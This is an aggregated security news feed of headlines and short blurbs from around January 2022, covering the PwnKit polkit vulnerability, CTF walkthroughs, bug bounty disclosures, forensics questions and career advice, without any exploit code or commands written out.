    Local File Inclusion Vulnerability
    Union from HackTheBox — Detailed Walkthrough
    Showing you all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »

    Full read SSRF via Lark Docs `import as docs` feature
    Lark Technologies disclosed a bug submitted by sirleeroyjenkins: https://hackerone.com/reports/1409727 - Bounty: $5000


    Certification Question
    I am enrolled in a boot camp for Certified Computer Forensics Examiner/Certified Mobile Forensics Examiner through InfoSec Institute next week. This was to prepare us for IACRB's certifications CCFE/CMFE. This morning, I noticed that InfoSec pulled the original syllabus, IACRB's website is locked down, and I have since learned that IACRB is now dissolved. InfoSec says that the certification will now be issued by them instead of IACRB (apparently, IACRB was affiliated with them originally). I know certifications aren't the end-all, be-all (experience is key, I know). But I want to make sure that I am receiving certs from organizations that are trustworthy. I've seen many job postings asking for the CCFE especially. Does this matter at all? Did IACRB's standing carry any clout previously, and will this now be lost? submitted by /u/FormerFive0
    Help with a ransomware infected Synology NAS
    Hi all, I recently encountered a Synology NAS with proprietary Synology RAID on both of its 4TB HDDs. I initially intended to acquire both drives and attempt to rebuild the RAID with all possible bit and stripe size combinations, but realised that it might not be worth it. My objective was to reacquire a readable drive and process the data in AXIOM for timeline, event log analysis etc. My last resort would be to run the NAS on a simulated network to access the files. But I realise that even then I may not be able to target a network drive to acquire the data. Perhaps only log file analysis by exporting Linux artefacts (bash history, recent files, system logs etc.). I would like to seek advice from those who have previously encountered such exhibits on how you managed to retrieve log records. Would running KAPE on a host network PC targeting the network drive, or perhaps using a Tsurugi OS machine and linking it to the NAS to run analysis tools, be useful here? submitted by /u/Drako880
    Does EnCase support Linux/Docker forensics?
    Which EnCase EnPack can we use to get memory from a Linux physical machine, and Docker memory? Which Linux forensic artifacts are supported by EnCase besides user login/bash history/process/network info, and is there any EnPack we can use? Does EnCase provide timeline analysis for Linux images/Docker images? submitted by /u/cyberfo

    Anyone have a good list of people to follow on Twitter for security updates? Preferably ones that have a lot of technical content.
    I know Twitter is very good for security news, but a lot of the ones I find are just like news sites that don't tell me much about the technical side of new vulnerabilities, attacks and bugs. I'm interested in pretty much all topics of security: AppSec, mobile sec, threat modelling, anything. If you have lists of people to follow who go into great technical detail, I'd be very grateful! Thanks! submitted by /u/Epsi0
    What is the best way to cleanse a PC?
    I'm no tech buff, so sorry if I'm asking all the wrong questions. But when I was living with family, my siblings would test out their spyware hacks on my laptop/phones. I remember on the laptop I could tell when they were trying something because it would start acting funny, and on startup or mid-session there would be a couple of cmd boxes that would appear, run something and close out by themselves. Recently I'm seeing the same type of things happening, mainly on my GF's laptop, but we are renting our own apartment so I am a little worried about security. I'm using Avira anti-virus but honestly think these things are a joke. My question is: how exactly do you protect against and get rid of attacks like this? I have tried reformatting the drives in the past, but that would only last long enough for whatever I deleted to redownload, and then I'll be having the same symptoms all over again. Sorry for the broad description; like I said, I'm not that tech savvy, but thanks for your time and hopefully you can point me in the right direction. Much appreciated! submitted by /u/Questionable_Qs_2655
    How does clicking an email link result in installing malware?
    Can someone explain exactly how clicking on a link in an email can install malware on a device? submitted by /u/LagunaLoireFF8
    How do you manage auxiliary AD accounts' password expiration?
    For example, separate admin accounts in an Active Directory without interactive logons (run-as): you don't get interactive notifications about password expiration for that account... how do you manage this? A script? submitted by /u/arnaudluti
    Why should sensitive documents not be sent via email?
    Why do people advise against sending sensitive documents via email? submitted by /u/Linux98

    CVE-2021-4034
    Article URL: https://ariadne.space/2022/01/27/cve-2021-4034/ Comments URL: https://news.ycombinator.com/item?id=30105994 Points: 2 # Comments: 0

    StellarParticle Campaign: Novel Tactics and Techniques | CrowdStrike
    submitted by /u/dmchell
    Prime Minister’s Office Compromised: Details of Recent Espionage Campaign
    submitted by /u/dmchell

    Technical Analysis of CVE-2022-22583: Bypassing macOS System Integrity Protection (SIP)
    submitted by /u/shleimeleh
    OSS PwnKit Detector (CVE-2021-4034)
    submitted by /u/SRMish3
    PwnKit: How to detect privilege escalation using CrowdSec
    submitted by /u/klausagnoletti
    [New] Configuring Linux AuditD for Threat Detection
    submitted by /u/InH4te
    How to use FaPro to simulate multiple devices in network
    submitted by /u/ntestoc3

    Domain Persistence: Golden Certificate Attack
    Introduction Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an The post Domain Persistence: Golden Certificate Attack appeared first on Hacking Articles.

    Sleep Attack: Intel Bootguard vulnerability waking from S3 (2021)
    Article URL: https://trmm.net/Sleep_attack/ Comments URL: https://news.ycombinator.com/item?id=30103498 Points: 1 # Comments: 0
    Xerox vulnerability to remotely brick network printers
    Article URL: https://neosmart.net/blog/2022/xerox-vulnerability-allows-unauthenticated-network-users-to-remotely-brick-printers/ Comments URL: https://news.ycombinator.com/item?id=30097563 Points: 2 # Comments: 0
    Polkit vulnerability was discovered in 2013
    Article URL: https://twitter.com/ryiron/status/1486207182404472832 Comments URL: https://news.ycombinator.com/item?id=30094998 Points: 2 # Comments: 0

    VulnHub: Detailed penetration walkthrough of the DC-6 machine
    A very detailed DC-6 penetration walkthrough, shared for learning and discussion only.
    FreeBuf Morning Report | Tor Project sues a Russian court; UK plans to educate children on the consequences of DDoS attacks
    The cybercrime unit of the UK National Crime Agency (NCA) is launching a program aimed at educating children about the consequences of DDoS attacks.
    Full translation and interpretation of the US "Memorandum on Improving the Cybersecurity of National Security, Department of Defense, and Intelligence Community Systems"
    This article interprets the National Security Memorandum (NSM) on Improving the Cybersecurity of National Security, Department of Defense, and Intelligence Community Systems signed by US President Biden from three angles: the background of its release, six key highlights, and industry reaction.
    Efficient information gathering for penetration testing (consolidated)
    Almost every security practitioner learning penetration testing is told that information gathering is the essence of pentesting. But is that really true?
    US government officially releases zero trust strategy, aiming to meet specific goals by the end of fiscal year 2024
    Launching a government-wide migration to a zero trust framework to substantially reduce the risk of cyber attacks against federal digital infrastructure.
    python_mmdt: comparing ssdeep, tlsh, vhash and mmdthash (6)
    This article compares the effectiveness of ssdeep, tlsh, vhash and mmdthash through a correlation analysis of 400 test files.
    Implementing SMS notifications for Cobalt Strike check-ins [another useless trick added]
    Ding! You have a new host online, please check!
    Ten departments including the Office of the Central Cyberspace Affairs Commission release the "Digital Village Development Action Plan (2022-2025)"
    The Action Plan sets out 26 key tasks across 8 areas in line with its development goals.
    [Intelligence tools] Sharing 24 domestic and foreign government open data platforms
    Open Data, and Government Open Data in particular, is an important but still under-utilized vast resource.
    Linux Polkit root privilege escalation vulnerability (CVE-2021-4034)
    polkit is an application-level toolkit that enables communication between processes of different privilege levels by defining and auditing authorization rules.
    "Gartner 2022 Critical Capabilities for Network Firewalls" report released; Fortinet receives the highest score in three use cases
    The World Economic Forum estimates that global cybercrime spending will reach a staggering $2.2 trillion in 2022.

    SecWiki News 2022-01-27 Review
    2021 IoT device CVE leaderboard by ourren; Reproducing two Flare-On 8 challenges by ourren; Incident response: trojan detection with Yara rules by ourren; ISOON2021 onsite domain penetration writeup by ourren; Decentralized CS check-in by ourren; Vulnerability monitoring platform: Monitor by ourren; On the importance of API security and governance approaches by ourren; For more of the latest articles, visit SecWiki
  • Open

    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on InfoSec Write-ups »  ( 4 min )
    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on Medium »  ( 4 min )
    How I was able to get HOF in one of the world’s leading hotel brands by 30 mins of googling.
    Hey Folks! Yash Dharmani (H1GH4T) here, Hope you’re all doing good. Continue reading on Medium »  ( 2 min )
    Finding bugs on Symfony
    Credit: How I was able to find multiple vulnerabilities of a Symfony Web Framework web application | by Abid Ahmad | Jan, 2022 | Medium Continue reading on Medium »  ( 1 min )
    Kindle You’re My Little Cuddle Bug Full
    You’re My Little Cuddle Bug Read Online    Download Link => You’re My Little Cuddle Bug     Book Description  Celebrate your little cuddle… Continue reading on Medium »  ( 2 min )
    Uppsala Security runs a bug bounty totaling US$200,000 with Nakji Network
    Uppsala Security is running a bug bounty program together with Nakji Network, a blockchain on-chain data indexing project. Continue reading on Medium »  ( 2 min )
  • Open

    Threat Assessment: BlackCat Ransomware
    BlackCat ransomware (aka ALPHV) is notable for its use of the Rust programming language and an aggressive approach to naming and shaming victims. The post Threat Assessment: BlackCat Ransomware appeared first on Unit42.
  • Open

    CyberDefenders | Hacked
    The Forensics write-ups  ( 4 min )
    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and…  ( 3 min )
    Bounty Hacker CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s Bounty Hacker CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    WGEL CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s WGEL CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    Day 19, Web Reconnaissance Or Information Gathering — Part 4#100DaysofHacking
    Get all the writeups from Day 1 to 17, Click Here Or Click Here.  ( 3 min )
  • Open

    Improper access control for users with expired password, giving the user full access through API and Git
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1285226 - Bounty: $950
    subdomain takeover on fddkim.zomato.com
    Zomato disclosed a bug submitted by mosec9: https://hackerone.com/reports/1130376 - Bounty: $350
  • Open

    This subreddit in the WayBack Machine.
    https://web.archive.org/web/*/https://www.reddit.com/r/opendirectories/ https://web.archive.org/web/*/https://old.reddit.com/r/opendirectories/ submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
  • Open

    CyberSoc | Cyber Detective CTF Write Up — Evidence Investigation
    OSINT-focused CTF Challenges. OSINT in Government, Stego, Crypto in multiple languages, WIFI, EXIF and more Continue reading on Medium »  ( 4 min )
  • Open

    [Cullinan #26] Add XXE (XML External Entity)
    This is Cullinan log #26. I've added an XXE entry. Usually I post once several changes have accumulated in Cullinan, but this time the gap got a bit long, so I'm posting it as a log. In the XXE content, the mitigation section is almost entirely replaced by a single link, since OWASP has summarised it so well, but I'll write that part up in more detail myself and update it later 😅 Add XXE (XML External Entity)
  • Open

    Exposing FBI's Most Wanted Iran's Mabna Hackers - An OSINT Analysis
    Dear blog readers, In this post I've decided to share actionable intelligence on the online infrastructure of FBI's Most Wanted Iran's Mabna Hackers for the purpose of assisting everyone in their cyber attack and cyber threat actor attribution campaigns.
    Exposing Behrooz Kamalian's Ashiyane ICT Company - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone some practical and actionable threat intelligence information regarding members of the Ashiyane Digital Security Team also known as Behrooz Kamalian's Ashiyane ICT Company for the purpose of assisting everyone in their cyber attack and cyber attack attribution campaigns.
    Profiling the Emotet Botnet C&C Infrastructure - An OSINT Analysis
    Dear blog readers, I've decided to share a recently obtained Emotet botnet C&C server IPs for the purpose of empowering everyone with the necessary technical information on their way to track down and monitor the botnet including to possibly assist and help where necessary in terms of cyber attack campaign attribution including cyber threat actor attribution campaigns. Sample currently active Emotet botnet C&C server IPs:

  • Open

    ZAP vs Burpsuite in my mind at 2022
    Hi :D I’m going to compare ZAP and Burpsuite after a long time. Of course, it’s extremely subjective, so I hope you might enjoy it. 📌 TL;DR ZAP has a powerful scripting engine and automation; Burpsuite has a powerful scanning engine and is the early adopter. They’re both really cool tools. 🔍 Compare
    Feature              | ZAP                                          | Burpsuite
    Proxy                | O, HTTP/1.1                                  | O🎖 HTTP/1.1, HTTP/2
    Passive Scan         | O                                            | O
    Active Scan          | O                                            | O
    Scan Configuration   | O🎖, Easy, Detail control                    | O
    Scan Results         | O, Mapping more information                  | O, Detail results
    Live Scan            | O, ATTACK Mode                               | O, Live tasks
    Manage scope         | O, Detail                                    | O, Easy
    Manage workspace     | O                                            | O
    Spidering            | O, Spider, Ajax Spider                       | O, Powerful Crawler
    Extensions (Addons)  | O, High quality                              | O🎖, High quality, Many features
    Scripting            | O🎖, Zest 👍, Ruby, Python, JS, Groovy, Etc  | O, Python, Ruby
    Performance          | O, Fast, bu…                                 |
    XXE (XML External Entity)
    🔍 Introduction XXE (XML External Entity) is an attack that induces a service that parses XML to parse malicious XML syntax, so that the service performs actions the attacker intends. Because the impact originates wherever the XML parser sits, it can range from internal-network access similar to SSRF at the low end up to RCE. 🗡 Offensive techniques Detect Put simply, you need to find the places where XML parsing happens. If you can see the source code, searching the code is the fastest and most efficient way; if you have to judge purely from behaviour without source, focus on places that take .xml files as arguments or that emit XML-parsing-related errors.
  • Open

    Pwnkit: How to exploit and check
    submitted by /u/DevSec23 [link] [comments]
    Reversing ALPHV (aka BlackCat): Rust-Based Ransomware
    submitted by /u/rsobers [link] [comments]
    Bypassing Little Snitch Firewall with Empty TCP Packets
    submitted by /u/hackers_and_builders [link] [comments]
    Perfect wordlist to discover directories and files on target size with tools like ffuf.
    submitted by /u/mexhanical [link] [comments]  ( 1 min )
    wholeaked: a file-sharing tool that allows you to find the responsible person in case of a leakage
    submitted by /u/utku1337 [link] [comments]  ( 2 min )
    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/apanonimo [link] [comments]
    Self-contained exploit for CVE-2021-4034 (Pkexec 1-day LPE)
    submitted by /u/ly4k_ [link] [comments]
    Exploit for CVE-2021-4034 that does not leave syslog entries
    submitted by /u/hermajordoctor [link] [comments]
    Webcam Hacking (again) - Safari UXSS
    submitted by /u/Straight_Finding_756 [link] [comments]
  • Open

    [Question] Using Shodan or another 'search engine' to find MS SQL servers
    Is it possible to use Shodan or another engine to find public facing SQL servers, more specifically, if you know of a database name, could it be found? I realize MS SQL has some default ports, and I can search for those, but I'm curious to know if it's possible to search for a database name, too. TIA. submitted by /u/Drivingmecrazeh [link] [comments]  ( 1 min )
    Password cracking options..
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? What's the price of it? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    What does a booter/stresser site need to do in order to be legal?
    I've seen tons of these booter projects and am aware that under certain circumstances the websites themselves are completely legal. What separates Redwolf from other DDoS sites you find all around in terms of legality? I understand that Redwolf is used legally and the other ones usually aren't, but what makes the website itself legal or illegal? submitted by /u/raultheuniverse [link] [comments]  ( 1 min )
    Accidentally DIRBed the wrong site
    I was playing around with dirb and was going to run it on a private test site but had a typo and accidentally ran it on an actual website and didn't realize for a few minutes that I had messed it up. Should I reach out to site administrator or be concerned or is it ok? EDIT: Lmfao at the comments keep them coming submitted by /u/Mesachi_06 [link] [comments]  ( 2 min )
    Sitting through Offsec 2-3 day exams
    I'm wondering what people with full time jobs and kids are doing about the Offsec courses with 2-3 day exams. Are you just biting the bullet and taking the exam or just taking the training and not taking the exam? After OSCP I've been just taking the Offsec trainings and going over material, but without a goal like taking an exam and getting the certification there's very little motivation to study the material. I usually go over the pdf to pick up some new tricks and move on. After full day of work and family I don't even know when to find 2-3 days straight to do the exam. I still don't understand why Offsec doesn't change the exams to 5 days and let people do it like it's done in a real world instead of putting unnecessary pressure with ctf style exam time frame. Also when I took OSCP exam I didn't have to deal with being monitored. I get up from computer chair every 20 minutes and I can see getting annoyed about having to deal with this for 2-3 days pretty fast. submitted by /u/ravenoverflow [link] [comments]  ( 5 min )
  • Open

    A brief overview of JWT and its exploits
    Introduction Continue reading on System Weakness »
    A brief overview of JWT and its exploits
    Introduction Continue reading on Medium »
    Beginner Bug Bounty Guide - Part 4
    Previous : Beginner Bug Bounty Guide - Part 3 Continue reading on Medium »  ( 2 min )
    Beginner Bug Bounty Guide - Part 3
    Previous : Beginner Bug Bounty Guide - Part 2 Continue reading on Medium »
    How to spoof e-mails. (DMARC, SPF, and Phishing)
    Note: sanitization of these screenshots was performed to protect the identities of stakeholders involved. Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - DIRECTORY TRAVERSAL LAB SOLUTIONS
    Directory Traversal allows attackers to access restricted directories on a web server and the web server's root directory… Continue reading on Medium »  ( 3 min )
  • Open

    Redis – Vulnerability Disclosure Program
    Article URL: https://hackerone.com/redis-vdp Comments URL: https://news.ycombinator.com/item?id=30091276 Points: 2 # Comments: 0
    Local privilege escalation vulnerability in polkit’s pkexec
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30086222 Points: 2 # Comments: 0  ( 8 min )
    PwnKit: Local Privilege Escalation Vulnerability Discovered in Polkit’s Pkexec
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30086204 Points: 1 # Comments: 0  ( 7 min )
    Android security tool APKLeaks patches critical vulnerability
    Article URL: https://portswigger.net/daily-swig/android-security-tool-apkleaks-patches-critical-vulnerability Comments URL: https://news.ycombinator.com/item?id=30085811 Points: 1 # Comments: 0  ( 3 min )
    Local privilege escalation vulnerability in polkit’s pkexec (CVE-2021-4034)
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30081671 Points: 1 # Comments: 0  ( 8 min )
    PwnKit: Vulnerability in Polkit (CVE-2021-4034)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30081666 Points: 5 # Comments: 0  ( 7 min )
  • Open

    Password cracking tools
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    Timeline from MFTECmd VS plaso & log2timeline
    I was taught these 2 methods of creating timelines from MFT. I am familiar with using the timeline output from MFTECmd. Is there a reason I should be using timeline from plaso & log2timeline? Are there benefits or details there I could miss from using MFTECmd? Because it seems slightly more tedious to generate timeline using plaso & log2timeline. Comments from those who use both? submitted by /u/bangfire [link] [comments]  ( 1 min )
    Encase Endpoint
    Any users of this product? How useful do you think it is? Have any real competitors popped up? (I've heard Symantec mentioned) I've heard some former customers say it was 10x+ cheaper than running multiple physical extractions with a large consultant submitted by /u/Nick_Investor [link] [comments]  ( 1 min )
  • Open

    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    chvancooten/NimPackt-v1: Nim-based assembly packer and shellcode loader for opsec & profit
    submitted by /u/dmchell [link] [comments]
    Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA
    submitted by /u/SCI_Rusher [link] [comments]
    Hacktivist group shares details related to Belarusian Railways hack
    submitted by /u/dmchell [link] [comments]
  • Open

    10 GiB of Classic music in FLAC or APE format
    https://funambule.org/classique/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    How can I stop getting my WiFi flagged??
    My network provider (or rather Warner Bros.) has flagged a download that I attempted for Dune (the 2021 movie). I wanna know how I can stop having my WiFi's address flagged for DMCA claims. submitted by /u/Raven_Claw7621 [link] [comments]  ( 1 min )
    AU/NZ/CA - TV & movie archive
    submitted by /u/vsharer [link] [comments]
    rotary telephones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Sooooo..... What happened to the Homeland Security post?
    be me see post click and see files nope the fuck out of there.... submitted by /u/ringofyre [link] [comments]  ( 1 min )
  • Open

    [Security Bulletin] Linux Polkit local privilege escalation vulnerability (CVE-2021-4034...
    Recently, a local privilege escalation vulnerability in the Polkit toolkit on Linux has appeared online; any unprivileged local user can use it to obtain root priv...
  • Open

    CVE-2022-0185: Container+Kubernetes manifest as crash POC
    Article URL: https://github.com/discordianfish/cve-2022-0185-crash-poc/blob/main/crash.c Comments URL: https://news.ycombinator.com/item?id=30087809 Points: 1 # Comments: 0  ( 1 min )
    Local privilege escalation vulnerability in polkit’s pkexec (CVE-2021-4034)
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30081671 Points: 1 # Comments: 0  ( 8 min )
    PwnKit: Vulnerability in Polkit (CVE-2021-4034)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30081666 Points: 5 # Comments: 0  ( 7 min )
  • Open

    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    SecWiki News 2022-01-26 Review
    2021 Annual Advanced Threat Research Report by ourren; [HTB] Safe Writeup by 0x584a. For more articles, visit SecWiki  ( 2 min )
  • Open

    Preparation and exam experience for the old-format OSCP
    I passed the OSCP exam in December 2021. Since the OSCP exam was reformed on 11 January 2022, the exam-experience part of this article is of limited reference value; the practical tips and preparation sections are still worth a look.  ( 1 min )
    FreeBuf Morning Report | New Linux vulnerability affects all versions; Segway online store attacked
    A security vulnerability (CVE-2021-4034) exists in Polkit's pkexec component, which means the default configuration of almost every Linux distribution contains it; an attacker can use it to obtain root privileges on the system.  ( 1 min )
    Research on the technical points of phishing attacks
    A study of phishing approaches.  ( 1 min )
    How to intercept traffic with Yakit
    Yakit essentially implements Burp's interception and packet-capture features and covers most of the same usage scenarios; as an open-source project that has only recently started, we hope you will keep an eye on it~  ( 1 min )
    Serious programming error may lead to file deletion; hackers use new malware to evade detection | Global cybersecurity hot topics, 26 January
    The maintainers of the Rust programming language have released a security update for a high-severity vulnerability that could be abused by a malicious party to delete files and directories from vulnerable systems without authorization.  ( 1 min )
    How to simulate devices in bulk with FaPro
    With FaPro, a single command creates a virtual network and simulates multiple different devices inside it.  ( 1 min )
    "Report on the Current State and Development of Cybersecurity Awareness Education in Chinese Enterprises" released
    The "Report on the Current State and Development of Cybersecurity Awareness Education in Chinese Enterprises" (hereafter "the Report") was released recently.  ( 1 min )
    "Measures for the Supervision of IT Outsourcing Risk in Banking and Insurance Institutions" released, tightening control of institutional outsourcing risk
    The Measures comprise 7 chapters and 46 articles and set out comprehensive requirements for IT outsourcing risk management at banking and insurance institutions.
    [Rootkit research series] Highly stealthy, highly persistent threats on the Windows platform
    This article discusses rootkits from the angles of their lifetime, the effects they can achieve, and the feasibility of using the technique to mount attacks.  ( 1 min )
    Zhejiang Province Public Data Regulations take effect on 1 March, again emphasising personal information security
    The Regulations comprise 51 articles and explicitly call for building a public data platform, establishing a public data sharing mechanism, and constructing a system for the orderly opening of public data.
    Expert judging panel for the first "New Forces in Cybersecurity" conference officially announced
    14 cybersecurity industry expert judges; come and see who they are!
  • Open

    Specific Payload makes a Users Posts unavailable
    FetLife disclosed a bug submitted by castilho: https://hackerone.com/reports/1176794 - Bounty: $100
  • Open

    ROP Hello World!
    submitted by /u/Kubiszox [link] [comments]
  • Open

    Ethical Hacking — Buffer Overflow Part 2
    Fuzzing is a software testing technique that supplies invalid data, that is, unexpected or random data, as input to a… Continue reading on Medium »  ( 2 min )
  • Open

    Is there anything equivalent to javas requestdispatcher.forward system in other programming languages?
    It's the easiest thing to leverage for pre-auth bugs: just looking at web.xml and leveraging internal forwards to touch APIs that normally require auth, and I would love to find something similar in other languages. The closest thing I've found is a special type of open redirect where the devs decided to keep previous session data, making it useful for auth bypasses in some PHP projects. See, the thing is open redirects usually kill previous session data, making them useless for auth bypassing on their own, and the Java forward system is like an internal, server-side version of a redirect that keeps session data and forwards everything along intact. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Could blind mass assignment be a rare type of bug?
    Some people know it as reflection binding, mass assignment or insecure direct object mapping, which is the opposite of insecure direct object reference: you're basically writing data instead of reading it, or appending data. So I've noticed in some places I'll send hidden parameters and the JSON response won't show anything interesting, but I'll refresh the page and I'll get like a discount or something. Say I add the parameter isSpecialDiscount: true; the response won't show anything related, so it's a blind mass assignment bug. And in some cases I've seen partial blind mass assignment where the JSON response will change to true for some things but still say false for others despite the request setting it as true, but when I refresh the page the server grants me the discount, proving it's processing the input and assigning my session a discount. I've never really seen people discuss blind or partial blind mass assignment being a thing, but I'm finding them a lot more now; it's weird. Usually I used to look at the JSON response to see if parameter values are changing, but I now see I can't even trust that completely to prove a mass assignment bug exists. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Anyone who works in a SOC dealing with disadvantages in maturing due to lack of management experience?
    Just curious how some of you guys who work in a SOC, whether it’s as an analyst or engineer, with a manager who doesn’t have the background. Do you have a lot of influence in shaping the SOC? Run in to roadblocks justifying tools or maybe maturing your processes? submitted by /u/bankster24 [link] [comments]  ( 2 min )
    Looking for first steps in changing careers with an unrelated(?) master's degree
    Hello /r/AskNetsec, this is my first post on here. I recently (coming up on a year) graduated with a M.A. in Forensic Psychology and Intelligence Analysis. This degree is not opening the doors in the psychology field I was hoping it would, and quite frankly, the work I have done in this field is not what I wanted out of my career. I have always been fascinated by cybersecurity, and it is a large part of the reason I decided to pursue the Intel part of my degree. My question to you all is this: What first steps would someone in my position take in trying to get into the Cybersecurity field? Ideally I would like to eventually work my way to a Security Analyst position. I have no qualms about starting at the lowest positions to work my way up, but am clueless on where to start. I have some coding knowledge in Python and Java, but as far as IT knowledge I am a total newbie. Are there certifications or courses I should prioritize? I would like to avoid going back to a university setting, as I have spent enough time and money doing that for the time being. Thank you to anybody who reads this and decides to respond, I really appreciate it. submitted by /u/Lambeau_Leap [link] [comments]  ( 1 min )
    Worth getting Net+/Sec+ with 3 years of exp in Blue Teaming?
    Heyhey, I'm not quite new to blue teaming (threat hunt & detection) but would like to have my options open in case I want to jump to a more senior tech role in the next year or so. I have a computer engineering degree and a SANS 401 (GSEC) cert too. Do you think it's worth getting? Thanks! submitted by /u/youmakemismile [link] [comments]  ( 1 min )
    Do RSA key fobs really strengthen security?
    Originally they did, I know. But there was this story about Chinese hackers compromising RSA, getting into the deepest levels of the production and key generation process. As a result, RSA alerted each and every customer of theirs and told them to use a personal PIN together with the code generated by the key fob. This is what I'm doing now on a daily basis. Now you have: your account password, your PIN you use together with the RSA-generated code, and the RSA-generated code. The RSA codes are compromised and you have to assume that there's some people out there knowing all the codes and algorithms. But that means they really aren't worth much; basically you only have a password and another, limited password called PIN, which is usually shorter and numbers only. The most you can expect from this is that, let's say, 10 characters alphanumeric + 6 digits is somewhat better than just the 10 characters alphanumeric, plus there's a good chance that they are stored in different systems, so less likely to be seized at the same time by some black hats. Is that true or do these key fobs still have an added value? submitted by /u/mshthn [link] [comments]  ( 2 min )
    Simple question about nmap
    If my friend tells me what his public IP address is and I use nmap to do a port scan on his public IP address, then what exactly is being port scanned? Since every device in his house will have the same public IP address. submitted by /u/LagunaLoireFF8 [link] [comments]  ( 2 min )
    Received H1 bug bounty but think I maybe should have gotten more. Am I just being greedy?
    I have received a bounty just under 20k. I understand that that’s a lot of money but I am curious from experts whether this is about the most I’ll get and I should just move on. I can’t disclose too much but I found a way to make myself very very rich very easily (no actual tools or request spoofing required). I’ve thought of some ways that one could have theoretically easily taken the free money with no trace and ran if they were a legitimate crook. The bug had been around for a while (Longer than a week). Unsure of how bad it was in terms of actual internal damages. I can honestly say that I probably saved them potential millions if not actual millions. It feels like the amount I received is honestly not much at all given the severity of it. Having said all of that, it wasn’t very hard to reproduce. It was less of a penetration report involving much skill and more of a “holy shit guys, your product is clearly broken and I can’t believe this hasn’t been patched” Am I being completely unreasonable/greedy? I should also note that their market cap is far into the billions which is why I am making this post to begin with. They’re a major industry leader. submitted by /u/csthrowawayyyy [link] [comments]  ( 4 min )
    Is an associates degree worth getting?
    I was told experience and certs are mostly required for most jobs aside from roles in management, which requires a BS or even masters. So I am just curious if there is any value in just getting an AS. The role that currently interests me is SOC analyst if that helps. I also heard of the WGU online program for a BS or masters in cybersecurity. If I plan on doing management in the future, is it worth getting my degree through this program? submitted by /u/RaZdoT [link] [comments]  ( 2 min )
  • Open

    How “Docker” can help you become a better hacker
    Continue reading on Medium »
    Ensuring protocol security with Immunefi bug bounty program
    Calling all devs and hackers. Help enhance our smart contract security and prevent thefts, freezes, and unintended changes and earn. Continue reading on Medium »  ( 2 min )
    I found a way to extract passwords from any iOS device. When I reported it to Apple? Silence.
    Apple’s Bug Bounty program, in theory, incentivizes programmers to report flaws they find in the company’s code. In practice? Not so much. Continue reading on Medium »  ( 3 min )
    What I learnt from reading 220* IDOR bug reports.
    IDOR — Insecure Direct Object Reference, abuse of the lack of authentication at every stage. Continue reading on Medium »  ( 3 min )
    First Bounty! Disable 2FA of any user via OTP bypass
    Getting that first bug bounty is a special feeling for any bug hunter. This is my first write up so please bear with me. Continue reading on Medium »  ( 1 min )
    First Valid BUG Finding At Microsoft And I Got the Acknowledgments Page Microsoft
    Hi Everyone. Continue reading on Medium »  ( 2 min )
    How I could have read your confidential bug reports by simple mail?
    Hey Everyone, Hope you’re doing safe and sound. Continue reading on InfoSec Write-ups »  ( 2 min )
    How I was able to takeover accounts in websites deal with Github as a SSO provider
    Introduction Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    pwntools on m1 mac?
